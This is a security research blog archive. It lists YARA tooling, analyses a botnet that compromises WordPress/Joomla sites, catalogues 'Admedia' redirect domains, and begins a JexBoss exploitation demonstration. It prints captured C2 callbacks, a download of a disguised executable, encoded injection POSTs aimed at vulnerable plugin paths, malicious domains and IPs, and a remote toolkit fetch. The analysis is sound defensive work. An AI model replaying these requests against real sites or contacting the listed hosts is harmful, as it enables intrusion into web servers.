2013-02 Yara Rules for APT1/Comment Crew malware arsenal
2013-01 Yara-goodies by Hiddenillusion
2012-12 Yara Editor by Ivan Fontarensky
2012 Malware.lu Yara signatures for some malware samples
2012-10 Moloch by AOL team Moloch is a IPv4 packet capturing (PCAP), indexing and database system. A simple web interface is provided for PCAP browsing, searching, and exporting. Moloch is not meant to replace IDS engines but instead work along side them to store and index all the network traffic in standard PCAP format, providing fast access. Moloch is built to be deployed across many systems and can scale to handle multiple gigabits/sec of traffic
2012-12 Peid signatures converted to Yara signatures by AlienVault
2012-12 Fighting Back Malware with IOC & Yara OSSIR Paris, 2012.12.11Saâd Kadhi
2012-12 G-Yara - a Web based (PHP) yara rule editor. It's a handy way to test yara rules as you write them.
2012-11 Writing Effective YARA Signatures to Identify Malware by David French
2012-10 Yara-normalize by Chris Lee. Normalizes Yara Signatures into a repeatable hash even when non-transforming changes are made.
2012-10 Peid4yara is the conversion of the PEiD signatures to work with the active Yara Malware Classifer
2012-10 Yarad and Ppyarad - Yarad deploys a server that can be used to scan files and streams centrally with yara and your own ruleset. Pyarad allows you to interact with yarad server from your python scripts. AlienvaultLabs
2012-10 MIDAS Metadata Inspection Database Alerting System (This is a project to create a system to automate the inspection and databasing of all Meta data information contained within all files destined for an organization (generally via dumping the files which are attached to emails through the use of YARA, but could also be automated via netwitness, other full pcap tool, or just to iterate through file servers looking for suspicious files). Alternatively, this can be used to look for heuristic anomalies in existing collections of files both malicious and benign.
2012-08 Create YARA Signature Demonstration video of the CreateYaraSignature.py
2012-08 Yara Signature Creation with IDA by Case Barnes from AccuvantLabs
2012-07 Yarascan plugin for Volatility Framework
2012-04 Extracting Binary patterns in malware sets (useful tool but has limitations on the number of files it will process and does not take into account the role of matching bytes that files share.
2011-01 Creating a Yara Signature for Shellcode
2011 Converting ClamAV signatures for Yara Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code Recipe 3-3
2011-08 Ruby bindings for the yara malware analysis library. Eric Monti
2011-12 Yara C-ICAP Server Module by Fyodor Grave
2011-11 An Intro to Creating Anti-Virus Signatures by Alexander Hanel
2011-11 Tools to scan the file system with custom malware signatures by Lenny Zeltser
2010 UltraEdit and TextMate code highlighting bundles for Yara
2009 Scout Sniper (scoutsniper) is a wrapper program for the Yara malware identification and classification tool and the Fuzzy Hashing program ssdeep. scoutsniper is designed to run all of the files in a designated directory against a designated Yara Rule file or ssdeep’s Fuzzy dynamic linked library (fuzzy.dll).
2009 Got your YARA?? Windows Incident Response blog

↧

Under this rock... Vulnerable Wordpress/Joomla sites...

May 31, 2013, 8:55 pm

≫ Next: Jan-Feb 2016 domains associated with "Admedia" Wordpress compromises (WP plugins)

≪ Previous: Yara Resources

Overview of the RFI botnet malware arsenal

Exploits directed at Wordpress and/or Joomla content management systems(CMS) have been increasing at a dramatic rate over the past year. Internet blogs and forums are flooded with posts about hacked CMS installations. Popular jargon refers to the attackers as "hackers", but it is generally understood that these mass compromises are being performed via automated scanners and tools. However, we believe that there is not enough coverage of the actual malware involved.

One such infection scheme is essentially the following:

A downloader trojan (Mutopy - Win32) (20a6ebf61243b760dd65f897236b6ad3 Virustotal) instructs the infected host to download:
1) Remote File Injector "Symmi" (Win32) 7958f73daf4b84e3b00e008258ea2e7a Virustotal
2) SDbot (Win32) - aaee52bfb589f6534c4b51e3b144dc08 Virustotal
3) PHP scripts for injecting into compromised Wordpress sites. Among them a PHP spambot (victimized site owners often get alerted about copious amount of meds and spam porn emanating from their sites). This is also the source of varied links for spam using thousands of various links redirecting to the same sites (e.g. weightloss, work at home scams, or porn sites)

The "hackers" attacking the Wordpress servers are armies of compromised windows desktops continuously checking the C&C servers for the new targets. This is the reason why cleaned but not fully patched/secured sites get compromised over and over. It's trivial for a site owner to discover the malicious PHP script on their server. It's much less so to discover how their server was compromised in the first place.

This will be the first in a series of posts examining various CMS attacks and server compromises that DeepEnd Research continues to track. In this post, we take a quick look at one such attack infrastructure. Our goal in this first post is to simply raise awareness of the malware, domains and hosting providers used in this current attack. At the time of this writing, the infrastructure is actively scanning and exploiting vulnerable sites. With the prompt assistance of Afilias, the domains used in this infrastructure have since been taken down.

Executing this sample in a virtualized sandbox environment allowed for RAM to be easily captured, and subsequently analyzed using Volatility v2.2. Examining the network connections active at the time of the RAM snapshot, we observe a number of outbound connections to remote sites on port 80.

Note that all but two outbound connections were created by conhost.exe (PID 3060), while mqtgsvc.exe (PID 2968) created the other two. Examining the process list, we see that PID 2968 is the parent of PID 3060, and both are active.

By examining the pcap, we learn that mqtgsvc.exe checks in with domain www.wholists.org

Unpacked version of conhost.exe 7958F73DAF4B84E3B00E008258EA2E7A contains Base94 alphabet, which is being used for encoding strings and communication requests in addition to common Base64

**!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~**

Examining the pcap shows initial communication with 'www.wholists.org' on 95.163.104.69 - initial callback

POST /protocol.php?p=544355219&d=+ldPFacHQRWmAUMZtUAAHfFREUG1RAQdpWxDf6QFQhE= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 782
User-Agent: -
Host: www.wholists.org
Connection: Keep-Alive
Cache-Control: no-cache

d=9kMAR6MOJUHhXRtO9B5McvZUG1PnQQsNrWQASedWQA2tcBNO53wCRf0TCWjYfz98wHw0dMRyIGXPfhtD4VwBT%2FVHLnf6XRZP5EAuY%2BZBAEX9RyRF4UAbT%2F1vIk%2F%2FWhFJ9kAuZetDHk%2FhVgB8wUYcXbVWAlL0Ak938kEcSf1UXx7BVhVJ4EcAWb4NJVL6RxcSvg0xQf1HPVD2XVJb23g%2Bbc9gPWbHZDNy1m8%2FSfBBHVP8VQZ8xFocRPxEAXzQRgBS9l0GdvZBAUn8XS5y5l0PBvZDAEehDiVB4V0bTvQeTHL2VBtT50ELDa1kAEnnVkANrXATTud8AkX9Ewlo2HAnfMB8NHTEciBlz34bQ%2BFcAU%2F1Ry53%2Bl0WT%2BRALmPmQQBF%2FUckReFAG0%2F9byJP%2F1oRSfZALmXrQx5P4VYAfMFGHF21VgJS9ABPd%2FJBHEn9VF8ewVYVSeBHAFm%2BDSVS%2BkcXEr4NMUH9Rz1Q9l1SW9t4J3PPHTZl1XInbMdvIU%2F1RwVB4VYubfpQAE%2FgXBRUz2QbTvdcBVPPcAdS4VYcVMVWAFP6XBx8w1weSfBaF1PPdgpQ%2F1wAReFvIFX9TlRF40EVFK5kE1L9WhxHvg0gRfRaAVThSl8exEEbVPYBXx7QUhxU3EMXTrNIOmvGYC4O13Y0YcZ%2FJnzAXBRU5FIARc9%2BG0PhXAFP9Ucud%2FpdFk%2FkQC5j5kEARf1HJEXhQBtP%2FW8gVf1O

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:10 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20

60
..F...@..>xH.G.....E.G.I._\S.\.E.R.P...R.....\.H..\J.TRC.].O.G\E.VR...@..A.N.@.A..]......GC..C.*

2. www.wholists.org directs the infected host to 'gettrial.store-apps.org' where it requests 'conh11.jpg' for download. We see that it's actually a WIN32 executable rather than a JPG file. The file has hash value of 7958f73daf4b84e3b00e008258ea2e7a and is well detected on VirusTotal

GET /d/conh11.jpg HTTP/1.1
User-Agent: -
Host: gettrial.store-apps.org
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:11 GMT
Content-Type: application/octet-stream
Content-Length: 98304
Last-Modified: Tue, 14 May 2013 20:21:33 GMT
Connection: keep-alive
Keep-Alive: timeout=20
ETag: "51929ccd-18000"
Accept-Ranges: bytes

3. Next, our bot sends a GET request, "/img/seek.cgi?lin=100&db=ndb" to "seek4.run-stat.org" on 46.165.230.185, followed by a GET to bt.ads-runner.org on 208.115.109.53 for ae1.php

GET /ae1.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: bt.ads-runner.org
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OKServer: nginx
Date: Mon, 27 May 2013 03:27:15 GMT
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 373
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 27 May 2013 03:27:15 GMT
Accept-Ranges: bytes
PldRR1A8aG1ma11xaWtsbGdwPi1XUUdQPAg+TENPRzwgSG1mayJRaWtsbGdwID4tTENPRzwIPlFX
QEg8SmciamcuIiJOY3ZrbCJhbWdmIm93ZGRma3RnZiIkImR3YWlnZiJmbWVle3F2e25nImBnZiJx
Z3o+LVFXQEg8Igg+UUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLXV1dSxlYHRjZXBrYW1uYyxh
bW8tYW1vcm1sZ2x2cS1hbW9dcm1ubi1jdUEzeixqdm9uIDxOY3ZrbCJhbWdmIm93ZGRma3RnZiIk
ImR3YWlnZiJmbWVle3F2e25nImBnZiJxZ3o+LWM8Pi1ma3Q8CD4tUUBNRls8CA==

There were several PHP scripts observed being downloaded from 46.165.230.185. These are part of the arsenal of scripts, one or more of which may be injected to a vulnerable server. We link here to the PHP scripts we saw in use this malware. The presence of any of these scripts on a CMS webserver is a good indication of compromise.

4. The next conversation our bot initiated was of particular interest. Here the bot sent multiple requests for "ggu.php" from 'fw.point-up.org' on 85.143.166.221. The server would respond with a single URL representing a Wordpress or Joomla site.

GET /ggu.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: fw.point-up.org
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
41
http://redacted.com/English/data/cache/diggCache/f7/19/18/page.php
0

We scripted a fetch of this file every few seconds and have since collected thousands of URLs that will be targeted for exploits. After receiving the target URL from the server on fw.point-up.org, the bot will attempt exploits with various payloads. By dumping the VAD of the 'conhost.exe' process, I was able to find references to CMS module paths that have had reported vulnerabilities. For example:

List of URLs from fw.point-up.org
The server response varies depending on the success or failure of the attempt. Examination of the traffic indicates a much larger proportion of apparently successful exploits than failures. The following are examples of three different responses that were seen.

1. OKe807f1fcf82d132f9bb018ca6738a19f+0 -- OK followed by 1234567890 MD5 encoded

POST /fincaxxxxxxoja/administrator/components/com_akeeba/assets/javascript.php HTTP/1.1 Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 Host: [redacted].com
Content-Length: 439
Connection: Keep-Alive
Cache-Control: no-cache

lQSWlN=UGN0azk5cGN0a3FwZ2dsa3RjcWNsQntvY2tuLGFtbw==&eveKxt=JbvnFDiuGIh&moYkYn=b3ZjNSxjbzIse2NqbW1mbHEsbGd2&dsmIC=PldRR1A8a3BvY110Y25nbHh3Z25jPi1XUUdQPAg%2BTENPRzwgS3BvYyJUY25nbHh3Z25jID4tTENP RzwIPlFXQEg8RHU4IiJEcGdxaiJhd29kY2FnZiJqZ3BnPi1RV0BIPCIIPlFATUZbPAg%2BZmt0PD5j ImpwZ2Q%2FIGp2dnI4LS1wd3hlY3BkbyxsZ3YtdXIvYW1sdmdsdi12amdvZ3EtdnVnbHZ7dmdsLWNO M0gsanZvbiA8RHBncWoiYXdvZGNhZ2YiamdwZz4tYzw%2BLWZrdDwIPi1RQE1GWzwI &jwIm=YVdRaWRBe0NbVQ==

HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache X-Powered-By: PHP/5.2.14
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

OKe807f1fcf82d132f9bb018ca6738a19f+0

2. Not Allowed = Host not vulnerable

POST /plugins/editors/jce/libraries/classes/json/defines.php
HTTP/1.1 Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 Host: www.[redacted].org
Content-Length: 506 Connection: Keep-Alive
Cache-Control: no-cache

lFgaqq=UGN0azk5cGN0a3FqY0J7Y2ptbSxrdg==&eaMKYX=QMMIJINvf&mQaLuv=b3ovZ3csb2NrbixjbzIse2NqbW1mbHEsbGd2&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR

HTTP/1.1
406 Not Acceptable
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache
Content-Length: 226
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

Not Acceptable!

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

POST /plugins/editors/jce/tiny_mce/plugins/advcode/img/test.php
HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: www.[redacted].com
Content-Length: 506
Connection: Keep-Alive
Cache-Control: no-cache
lFgaqq=UGN7OTlwY3tgZ2xgbUJlb2NrbixhbW8=&eaMKYX=QMMIJINvf&mQaLuv=ZW9ja24vcW92ci9rbCxuLGVtbWVuZyxhbW8=&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR

HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:20 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-7+squeeze14 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 X-Powered-By: PHP/5.3.3-7+squeeze14 Vary: Accept-Encoding Content-Length: 354 Content-Type: text/html; charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

Hosting Infrastructure

The following is a list of the domains and IP addresses that were seen as part of this botnet infrastructure

Domain	IP Address	ASN	Network Name
wholists.org	95.163.104.69	AS12695	Digital Networks CJSC
gettrial.store-apps.org	95.163.104.94	AS12695	Digital Networks CJSC
t22.run-stat.org	95.163.104.69	AS12695	Digital Networks CJSC
seek4.run-stat.org	46.165.230.185	AS16265	Leaseweb
bt.ads-runner.org	208.115.109.53	AS23033	Wowrack
fw.point-up.org	85.143.166.221	AS56534	PIRIX-CORPNET-2

Passive DNS

95.163.104.69	95.163.104.94	46.165.230.185	208.115.109.53	85.143.166.221
www.wholists.org	ns1.wholists.org	ns1.upsave.info	ntp.run-stat.org	fw.point-up.org
bns.wholists.org	ns1.store-apps.org	fw.stat-run.info	bt.ads-runner.org	ns2.memrem.ru
gjd.wholists.org	ns1.games-olympic.org	fw.run-stat.org	sk4.ads-runner.org	ns2.nalkanet.ru
lbh.wholists.org	ns1.googleminiapi.com	mail.stat-run.info	ntp.stat-run.info	ns2.nallanite.ru
qdp.wholists.org	peace.vijproject.com	bt2.run-stat.org		vm.clodoserver.ru
www.techsign.org	sogood.vitaminavip.com	jc.upsave.info
ml.inviteyou.info	img.stat-run.info	ju.upsave.info

Passive DNS data courtesy of ISC SIE

Routing and Peers

The following are the BGP peering relationship graphs of the prefixes for the involved hosting providers.

95.163.104.69 & 95.163.104.94- ASN12695 - Digital Networks CJSC (DINET)

Peering for AS12695 - January, 2013

Peering for AS12695 - May, 2013

In January, we see that for the prefix, 95.163.64.0/18, AS3216 and AS8657 were the primary upstreams for DINET, while in May, they added AS31133.

AS3216 - SOVAM-AS OJSC _Vimpelcom
AS8657 - CPRM PT Comunicacoes S A
AS31133 - MF-MGSM-AS OJSC MegaFon
CIDR Report for AS12695

208.115.109.53 - AS23033 - WowRack

Peering for AS23033 - January, 2013

Peering for AS23033 - May, 2013

For the prefix, 208.115.109.0/24, Wowrack's primary upstream is AS11404, AS-VOBIZ - vanoppen.biz LLC.
CIDR Report for AS23033

85.143.166.221 - AS56534 - PIRIX-CORPNET-2

Peering for AS56534 - January, 2013

Peering for AS56534 - May, 2013

In January, for the prefix, 85.143.160.0/21, AS9002 and AS3267 were Pirix's primary upstreams. In May, they briefly added a relationship with AS50384.

AS9002 - ReTN.net
AS3267 - RUNNET
AS50384 - W-IX_LTD
CIDR Report for AS56534

DeepEnd Research will continue to report our findings and analysis of the malware and hosting infrastructure pertaining to CMS exploits. We also are working with victim organizations regarding any successful compromises detected.

Please feel free to contact us directly if you have anything you'd like to share, or if you would like further information from us.

↧

Jan-Feb 2016 domains associated with "Admedia" Wordpress compromises (WP plugins)

February 12, 2016, 12:15 pm

≫ Next: JBoss exploits - View from a Victim

≪ Previous: Under this rock... Vulnerable Wordpress/Joomla sites...

We've been seeing a fair number of compromised Wordpress sites with various javascript plugins that are redirecting visitors to assorted malicious domains.

Sucuri discussed this in an excellent post: "Massive Admedia/Advertising iFrame Injection"

Since then, we've seen the URI construct of the redirection change from "/admedia/?" to "/megaadvertize/?keyword="

Currently the most popular redirect URLs appear to be:
http://vrot.stervapoimeniliana[.]info/megaadvertize/?keyword=<>
http://pon.krasnayadama[.]info/megaadvertize/?keyword=<>

All the redirect domains we've seen use the following as nameservers

gotl549293.mars.orderbox-dns[.]com
gotl549293.earth.orderbox-dns[.]com
gotl549293.venus.orderbox-dns[.]com
gotl549293.mercury.orderbox-dns[.]com

So to get an idea of what other domains might be used for this campaign, we looked at two things:
* Which domains are using these nameservers?
* Which domains have the email address "valera.valera-146.yandex.ru" in the DNS SOA records.?

Below is a list of the domains meeting this criteria:

barabawka.net
london88.pw
barada222.pw
suchka46.pw
easy-trading.biz
balw5ezvicz7hka.pw
balw5ezvicz7hka.pw
goroda235.pw
trymyfinger.website
trymyfinger.website
borodavka.website
zaleimneviskivgorlo.website
bababolka.website
daitepospatirodu.website
poprobyimoihyi.website
suchkakrawenaya.website
lovelyclub.biz
lovelygames.biz
tapochekmiwu.website
tapochekkati.website
tapochekmiwu.website
suchtozahyinya.com
golayagopa.website
goluivovka.website
goluivalerka.website
golayapipetka.website
golayazadnica.website
suchtozahyinya.com
batyaebetvseh.website
matyaebetvseh.website
rozovuiurka.website
rozovuimiwka.website
rozovuisawka.website
rozovuivasunya.website
mainlandpage.website
siniuurka.website
siniukolka.website
siniusawka.website
zaleimneviskivgorlo.website
chernuioleg.website
chernuikolya.website
chernuipetya.website
chernuisanya.website
kolhoznik.website
malenkiyprince.website
zaleimneviskivgorlo.website
beluidanya.website
beluilanya.website
beluisanya.website
beluitanya.website
beluivanya.website
beluidanya.website
seruidebil.website
seruisanya.website
seruitanya.website
seruidyatel.website
seruidolboeb.website
mainlandpage.website
zelenuiranya.website
zelenuisanya.website
zelenuitanya.website
zelenuivanya.website
meetclub.biz
borodatayagenwina.website
borodatuiloh.website
borodatuiotec.website
borodatuimyguk.website
borodayasobaka.website
easy-trading.biz
zo1lotayawlyapa.website
zol1otayawlyapa.website
zolo1tayawlyapa.website
zolot1ayawlyapa.website
zolota1yawlyapa.website
zolotay1awlyapa.website
zolotaya1wlyapa.website
zolotayaw1lyapa.website
zolotayawl1yapa.website
zolotayawly1apa.website
getallcooltraffic.com
trymysocks1.ws
trymysocks2.ws
trymysocks4.ws
trymysocks5.ws
forexmyways.com
gameforgods.com
ilovetradingz.com
nicefilmwatchs.com
realylovegames.com
surveyforyourss.com
watchlovedfilms.com
fastestmonkeymakes.com
moneyforfriends.net
pl1atiebeloe.ws
platie1beloe.ws
platieb1eloe.ws
getallcooltraffic.com
lovelygames.biz
nicefilmwatchs.com
watchlovedfilms.com
surveyforyourss.com
1n-dobloebu.ws
1n-dobloebu1.ws
1n-dobloebu2.ws
1n-dobloebu3.ws
gamingguidess.com
landpagegames.com
localpagegengames.com
moneyforfriends.net
zzzsleepy.ws
zzzsleepy1.ws
zzzsleepy2.ws
realylovegames.com
fastestmonkeymakes.com
zzzmaluw3.ws
zzzmaluw4.ws
gameforgods.com
ownfavoritesite.com
dearcustomersgogo.com
listenquicklypage.com
gameforgods.com
ilovetradingz.com
polnuewtaniwki.ws
p3olnuew3taniwki.ws
poln1uewt1aniwki.ws
polnu4ewtan4iwki.ws
polnue2wtani2wki.ws
polnuewtaniwki.ws
dearcustomersgogo.com
trackersystemsz.biz
barkdenboms.com
crazydomainfoq.com
p3olnuew3taniwki.ws
poln1uewt1aniwki.ws
polnu4ewtan4iwki.ws
polnue2wtani2wki.ws
dydochka12345.ws
lydochka12345.ws
vodochka12345.ws
mordochka12345.ws
collectinfoitemsz.com
findyourwaytotr.net
samplefasttrack.org
getmylovelyyy.com
dearcustomersgogo.com
polnuewtaniwki.ws
barkdenboms.com
listenquicklypage.com
trackersystemsz.biz
findyourwaytotr.net
goingfortraff.com
trackingzystem.com
findtrafficcount.com
p3olnuew3taniwki.ws
polnu4ewtan4iwki.ws
polnue2wtani2wki.ws
poln1uewt1aniwki.ws
barkdenboms.com
crazydomainfoq.com
fabosik12345.ws
nifnafbet.biz
nifnafbet.com
nifnafbet.net
nifnafbet.org
baltimoreprivet.biz
baltimoreprivet.org
baltimoreprivet.com
baltimoreprivet.net
dedulkasanya.biz
malenkiuniger.biz
oduvanchiksawa.biz
dedulkasanya.com
oduvanchiksawa.com
dedulkasanya.net
oduvanchiksawa.net
dedulkasanya.org
oduvanchiksawa.org
malenkiuniger.info
malenkiuniger.com
malenkiuniger.net
malenkiuniger.org
chrenovuihren.biz
chrenovuihren.com
bolwayazalypencuya.com
chrenovuihren.net
bolwayazalypencuya.net
chrenovuihren.org
bolwayazalypencuya.org
chrenovuihren.biz
babulkadayn.in.net
babulkasyka.in.net
forbetterget.in.net
babulkamaksim.in.net
bravayasuchka.in.net
nravayasuchka.in.net
pravayasuchka.in.net
wravayasuchka.in.net
poprobyipoprawaika.in.net
bravayasuchka.in.net
nravayasuchka.in.net
pravayasuchka.in.net
wravayasuchka.in.net
thatsbigidea.info
crazyfastestway.info
belayadama.info
serayadama.info
chernayadama.info
krasnayadama.info
stervapoimeniolya.info
stervapoimenialena.info
stervapoimenialina.info
stervapoimeniliana.info

Nearly all domain names are transliterated Russian word combinations.
Some of the domains registered by valera.valera-146@yandex.ru such as barabolka[.]com bear the Registrant Name: Valeriy Babosuch. - http://www.whoismind.com/whois/barabolka.com.html

This name is associated with other domains listed below and registrant email address mindupper@gmail.com .

Domains registered by mindupper@gmail.com were made of mostly English language word combinations.

Some of the domains associated with Nuclear EK and Pony/Fareit post infection were hosted on 162.247.12.207. See more at:
http://malwaredb.malekal.com/url.php?netname=WFC
http://malwarefor.me/2015-04-26-nuclear-ek-dropping-ponyfareit/

162.247.12.207
https://www.virustotal.com/en/ip-address/162.247.12.207/information/
Country CA - Autonomous System6939 (Hurricane Electric, Inc . )

Phishing (such as https://whois.domaintools.com/blondescript.net) was seen on 91.200.85.137

Passive DNS results for these two IP addresses reveal the domains. VirusTotal results show:

3/66 2016-01-10 15:49:37 http://givemeaudi . com/
4/66 2015-12-13 15:31:51 http://sampletds . net/
4/66 2015-11-25 09:25:32 http://yellowfrance . info/
2/67 2015-11-22 04:21:10 http://sampletds . org/
1/66 2015-11-20 10:51:43 http://yellowfrance . com/
3/63 2015-07-19 14:33:43 http://sampletds . info/
6/63 2015-06-08 01:03:04 http://www . yellowfrance . info/
4/63 2015-05-19 09:43:33 http://yellowfrance . com/wRJrUHURtdt20 . html
3/63 2015-04-30 15:37:56 http://yellowfrance . com/HelVGnsIlBR20 . html
3/62 2015-04-21 14:30:13 http://yellowfrance . com/falJTWHvsFU20 . html
6/62 2015-04-21 13:35:51 http://yellowfrance . info/qYCrsJuHWhE20 . html
3/62 2015-04-17 10:49:08 http://yellowfrance . com/sHrWgPcxdvy20 . html
6/62 2015-04-16 02:21:39 http://yellowfrance . info/woMbVHaDOfk20 . html
6/62 2015-04-15 19:46:12 http://yellowfrance . info/HXndqXghAHy20 . html
6/62 2015-04-15 19:45:57 http://yellowfrance . info/ppmerkzbRUk20 . html
2/62 2015-04-15 18:57:31 http://givemeaudi . com/ZlqkpeqDQoy20 . html
6/62 2015-04-15 18:33:34 http://yellowfrance . info/JYndncMIRlu20 . html
6/62 2015-04-15 14:31:15 http://yellowfrance . info/vTGmbyYZBGB20 . html
6/62 2015-04-13 14:23:58 http://yellowfrance . info/YRgyxhPwalE20 . html
1/62 2015-04-09 19:58:58 http://givemeaudi . com/jWRihuJevxB20 . html
6/62 2015-04-09 15:12:33 http://yellowfrance . info/LqLEqeicSXT20 . html
6/62 2015-04-09 15:12:15 http://yellowfrance . info/RhFaRmFvnhE20 . html
3/62 2015-04-09 02:35:13 http://yellowfrance . info/qXgxBLvENoH20 . html
4/62 2015-04-08 11:49:18 http://yellowfrance . info/LEZrGknOuaD20 . html
3/62 2015-04-07 18:33:32 http://yellowfrance . info/BaKYxblgbHt20 . html
3/62 2015-04-07 10:44:09 http://yellowfrance . info/gUoyLbRBcJw20 . html
3/62 2015-04-06 18:55:57 http://yellowfrance . info/AomQXriDFBd20 . html
3/62 2015-04-06 05:21:23 http://yellowfrance . info/rIoeSAnGUuf20 . html
3/62 2015-04-03 20:32:58 http://yellowfrance . info/wpwssjkpevc20 . html
3/62 2015-04-02 14:30:25 http://yellowfrance . info/cLFHmTVqCEW20 . html
3/62 2015-04-02 13:11:26 http://yellowfrance . info/KyLpyRWHMUb20 . html
2/62 2015-04-01 12:08:35 http://yellowfrance . info/GNuCrxcJYcP20 . html
2/62 2015-04-01 10:06:37 http://yellowfrance . info/lvNbgtiyxOu20 . html
1/62 2015-04-01 01:53:08 http://yellowfrance . info/inDOFfbujAt20 . html
1/62 2015-04-01 00:23:39 http://yellowfrance . info/vvBdLhNoChB20 . html
1/62 2015-03-31 23:59:50 http://yellowfrance . info/pAJQxOsQxXP20 . html
1/62 2015-03-17 02:16:12 http://sampletds . org/cevch18 . html
1/62 2015-03-16 19:42:09 http://sampletds . org/ANcXoDpCldL20 . html
1/62 2015-03-12 17:48:28 http://sampletds . info/in . cgi?
1/62 2015-03-12 15:47:25 http://sampletds . net/in . cgi?20&CS=1
1/62 2015-03-12 13:48:35 http://sampletds . net/in . cgi?20&CS=1
1/62 2015-03-12 13:43:03 http://sampletds . net/SfzYoUZLuDw20 . html
2/52 2014-05-23 14:11:51 http://theviagrapills . com/?1

Registrant Name: Valeriy Babosuch
Registrant Organization:
Registrant Street: Truhanovskaya 45
Registrant City: Moscow
Registrant State/Province: N/A
Registrant Postal Code: 121497
Registrant Country: RU
Registrant Phone: +7 . 9453466645
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: mindupper@gmail.com

Compromises in CMS, including Wordpress, Joomla!, and Drupal remain a significant threat. Detecting the malicious redirect via the URI construct is useful. However this is often changed quickly by the attacker. Hopefully to improve awareness and detection, we wanted to provide this list of domains that may be related to this active Wordpress compromise.

↧

JBoss exploits - View from a Victim

April 12, 2016, 7:10 pm

≫ Next: Threat Intel - Ransomware Payment Sites Feed

≪ Previous: Jan-Feb 2016 domains associated with "Admedia" Wordpress compromises (WP plugins)

JBOSS

Over the past few months, the distribution vector for "Ransomware" has shifted to a more targeted approach.

Several hospitals and healthcare organizations recently found themselves the victim of a widespread Ransomware infection.

Exploits against JBoss are believed to be responsible for several of these incidents, where a compromised JBoss server allowed access to the hospital's internal network.

For an excellent writeup of Ransomware infections using the JBoss exploits, see the Cisco Talos blog: "SamSam: The Doctor Will See You, After He Pays the Ransom"

Note that "JexBoss" is described as the exploit tool of choice. JexBoss exploits very old vulnerabilities in JBoss, and takes advantage of poor upgrading or patching policies.

Via Shodan or Google 'dorking', one can determine that there are a great deal of JBoss deployments.

It can be safe to assume that many of these deployments likely remain vulnerable.

While healthcare and hospitals are the target 'du jour', other high profile industry segments running old JBoss, may be targeted next.

In an effort to raise awareness to the JexBoss exploit and what it looks like from the victim's point of view, we stood up two vulnerable JBoss servers and exploited them using JexBoss.

We're providing some screen shots of JexBoss in action, along with the network packet captures from the vantage of the victim. We also will provide a list of the Snort and Emerging Threat IDS signatures that currently alert on this traffic.

Our test environment consisted of two Amazon EC2 instances running RedHat linux. I configured the first instance to run JBoss v6, and the other to run JBoss v4.

Please don't bother to test or "attack" the EC2 instances I used. They are firewalled to the world, except to my IP :)

The attacking environment was a simple Debian linux VM with JexBoss installed.

Attacking JBoss 4

Running JexBoss against a vulnerable host is quite trivial. You simply provide the URL of the JBoss instance, and hit Enter.

The following image shows how JexBoss found the JBoss web-console, jmx-console and JMXInvokerServlet as being vulnerable.

JexBoss attack against a JBoss v4 host

In this example, I ran the exploit against jmx-console. I then ran the linux 'ls' command to display the files on the compromised host.

Saying "Yes" to automated exploitation of jmx-console will instruct the victim server to pull a remote exploit toolkit named "jbossass.war" from 'joaomatosf.com'.

Victim server fetching remote exploit toolkit

